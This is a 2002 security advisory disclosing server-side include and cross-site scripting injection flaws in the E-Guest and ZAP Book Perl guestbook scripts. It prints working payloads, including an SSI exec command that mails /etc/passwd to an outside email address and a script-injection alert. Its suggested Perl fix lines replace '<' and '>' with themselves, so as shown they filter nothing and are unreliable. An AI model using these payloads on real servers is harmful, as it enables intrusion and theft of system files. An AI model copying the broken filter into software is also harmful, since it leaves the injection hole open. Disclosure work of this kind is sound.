[ DownBload Security Research Lab Advisory ] [-------------------------------------------------------------------------] Advisory name: SSI & CSS execution in E-Guest (1.1) & ZAP Book (v1.0.3) Advisory number: 6 Application: E-Guest (1.1) & ZAP Book (v1.0.3) (CGI scripts) ---[ E-Guest Author: Leung Eric E-mail: cgi@leungeric.com Homepage: http://leungeric.com Working demo: http://leungeric.com/eric/demo/E-Guest_sign.pl ---[ ZAP Book Author: Sephiroth32 E-mail: sephiroth32@unitedff.com Homepage: http://www.unitedff.com Date: 28.06.2002 Impact: remote user can execute shell commands & cross site scripting Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4 Discovered by: DownBload Mail me @: downbload@hotmail.com ======[ Overview --[ E-Guest is "...full feature guestbook written in Perl...". Maybe little too much 'full feature' ;). --[ ZAP Book is guestbook too, but it is more advanced than E-Guest. ======[ Problem It looks that it is very hard to find secure guestbook. ;). --[ E-Guest author wrote - "HTML tag filtering". That is true, but only 'comment' is filtered, and there is still name, email, homepage and location, where we can put our nasty SSI or CSS code. --[ ZAP Book is different animal. In ZAP Book, almost everything is filtered. Exception is 'post' variable, which contains user comment, so again, we can put our nasty SSI or CSS code in 'post' variable. ======[ Examples ---[ E-Guest SSI attack ~~~~~~~~~~ Full Name: HI<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"- -> E-mail: downbload@hotmail.com Homepage: UIN: Location: Beyond the light Comment: Nothing special, just SSI attack. CSS attack ~~~~~~~~~~ Full Name: HI<script>javascript:alert('HACKED BY DOWNBLOAD');</script> E-mail: downbload@hotmail.com Homepage: UIN: Location: Beyond the light Comment: Nothing special, just CSS attack. ---[ ZAP Book SSI attack ~~~~~~~~~~ Name: DownBload Email: downbload@hotmail.com Homepage: Location: AIM Screename: MSN Email: Yahoo! Screename: ICQ Number: Referred by: Search Engine Entry: SSI attack <!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"--> CSS attack ~~~~~~~~~~ Name: DownBload Email: downbload@hotmail.com Homepage: Location: AIM Screename: MSN Email: Yahoo! Screename: ICQ Number: Referred by: Search Engine Entry: CSS attack <script>javascript:alert('HACKED BY DOWNBLOAD');</script> ======[ Solution As i said in 'Makebook advisory', solution for SSI & CSS attack is filtering special characters from user input. ---[ E-Guest FIX: Add next code to E-Guest_sign.pl (or wait for fixed version :-): ... $fullname =~ s/</</g; $fullname =~ s/>/>/g; $email =~ s/</</g; $email =~ s/>/>/g; $homepage =~ s/</</g; $homepage =~ s/>/>/g; $uin =~ s/</</g; $uin =~ s/>/>/g; $location =~ s/</</g; $location =~ s/>/>/g; ... ---[ ZAP Book FIX: Add next code to addentry.cgi (or wait for fixed version :-): ... $in{'post'} =~ s/</</g; $in{'post'} =~ s/>/>/g; ... ======[ Greetz Greetz goes to #hr.hackers <irc.carnet.hr>. Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, fi, Sunnis, Fr1c, harlequin, Astral and www.active-security.org. Special shitz goes to: DarkMan from crohack a.k.a darkforum, and his stupid friend h4x0r.
